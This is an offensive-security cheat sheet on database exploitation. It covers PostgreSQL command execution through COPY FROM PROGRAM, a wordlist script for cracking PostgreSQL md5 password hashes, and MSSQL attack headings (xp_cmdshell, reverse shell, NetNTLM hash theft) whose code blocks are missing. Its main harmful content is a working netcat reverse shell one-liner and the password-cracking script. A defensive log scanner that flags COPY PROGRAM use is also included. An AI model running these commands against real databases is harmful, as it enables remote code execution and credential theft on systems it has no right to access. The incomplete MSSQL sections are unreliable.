Database Exploitation

PostgreSQL Command Execution

Using COPY TO/FROM PROGRAM

PostgreSQL installations running version 9.3 and above have functionality that allows the superuser, and any user granted the 'pg_execute_server_program' role, to pipe data to and from an external program using COPY.

Check if the user is superuser

SHOW is_superuser;
SELECT current_setting('is_superuser');
SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;

Then create a table for the output and run the command via COPY FROM PROGRAM:

CREATE TABLE shell(output text);
COPY shell FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT >/tmp/f';
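From the defender's side, the same COPY ... TO/FROM PROGRAM feature leaves a trace in the statement log. The following Python is an added example, not part of the original notes: it scans constructed PostgreSQL log lines (assumed default log_line_prefix '%m [%p] ' with log_statement = 'all') for COPY to or from PROGRAM and for grants of pg_execute_server_program.

```python
import re
from dataclasses import dataclass

# Constructed log lines for this example: default log_line_prefix '%m [%p] '
# with log_statement = 'all', so every statement is logged.
SAMPLE_LOG = """\
2024-05-01 10:15:02.117 UTC [4211] LOG:  statement: SELECT current_setting('is_superuser');
2024-05-01 10:15:09.402 UTC [4211] LOG:  statement: CREATE TABLE shell(output text);
2024-05-01 10:15:11.930 UTC [4211] LOG:  statement: copy shell from program 'id';
2024-05-01 10:16:40.005 UTC [4380] LOG:  statement: COPY events TO '/tmp/events.csv';
2024-05-01 10:17:01.551 UTC [4380] LOG:  statement: GRANT pg_execute_server_program TO app_user;
2024-05-01 10:17:05.000 UTC [4380] LOG:  statement: COPY t TO PROGRAM 'gzip > /tmp/t.gz';
"""

# timestamp, backend pid and the logged statement text
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] LOG:\s+statement: (?P<sql>.*)$"
)
# COPY ... FROM PROGRAM or COPY ... TO PROGRAM, any case or spacing
COPY_PROGRAM_RE = re.compile(r"\bCOPY\b.*?\b(FROM|TO)\s+PROGRAM\b", re.I)
# a GRANT that hands the same capability to a non-superuser role
GRANT_RE = re.compile(r"\bGRANT\s+pg_execute_server_program\b", re.I)


@dataclass
class Finding:
    ts: str
    pid: str
    kind: str  # "copy_program" or "grant_server_program"
    sql: str


def scan_log(text):
    # one Finding per logged statement that reaches (or enables reaching) the OS
    findings = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # continuation lines, DETAIL/ERROR lines, other prefixes
        sql = m.group("sql")
        if COPY_PROGRAM_RE.search(sql):
            kind = "copy_program"
        elif GRANT_RE.search(sql):
            kind = "grant_server_program"
        else:
            continue
        findings.append(Finding(m.group("ts"), m.group("pid"), kind, sql))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.ts} pid={f.pid} {f.kind}: {f.sql}")
```

Note that log_statement = 'mod' records COPY FROM but not COPY TO, so COPY ... TO PROGRAM is only visible in the log at the 'all' level.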

PostgreSQL Cracking (md5 password + username)

The hashes in pg_shadow use this format: md5(password + username)

If we are not able to crack the PostgreSQL md5 hash directly, we can use this script.

import hashlib

# pg_shadow stores "md5" followed by the lowercase hex md5 of password || username
target_hash = "md5ae8c67affdb169a42c9631c02fc67ede"
username = "rubben"

# rockyou contains non-UTF-8 bytes, so read it as latin-1 to avoid decode errors
with open("/usr/share/wordlists/rockyou.txt", "r", encoding="latin-1") as f:
    for line in f:
        password = line.strip()
        # the username acts as the salt and is appended, not prepended
        combo = password + username
        hashed = "md5" + hashlib.md5(combo.encode()).hexdigest()
        if hashed == target_hash:
            print(f"[+] Password found: {password}")
            break

MSSQL

Check privileges

Enable xp_cmdshell (With privileges)

For establishing a reverse shell (rev.ps1 is the Nishang shell):

Other Method

Steal NetNTLM Hash / Relay Attack (Without privileges)

Even if we can't execute commands using xp_cmdshell, we can still steal the NetNTLM hash of the SQL service account by using xp_dirtree or xp_fileexist.

Then grab the hash with smbserver:

Enable xp_cmdshell via SQL Injection
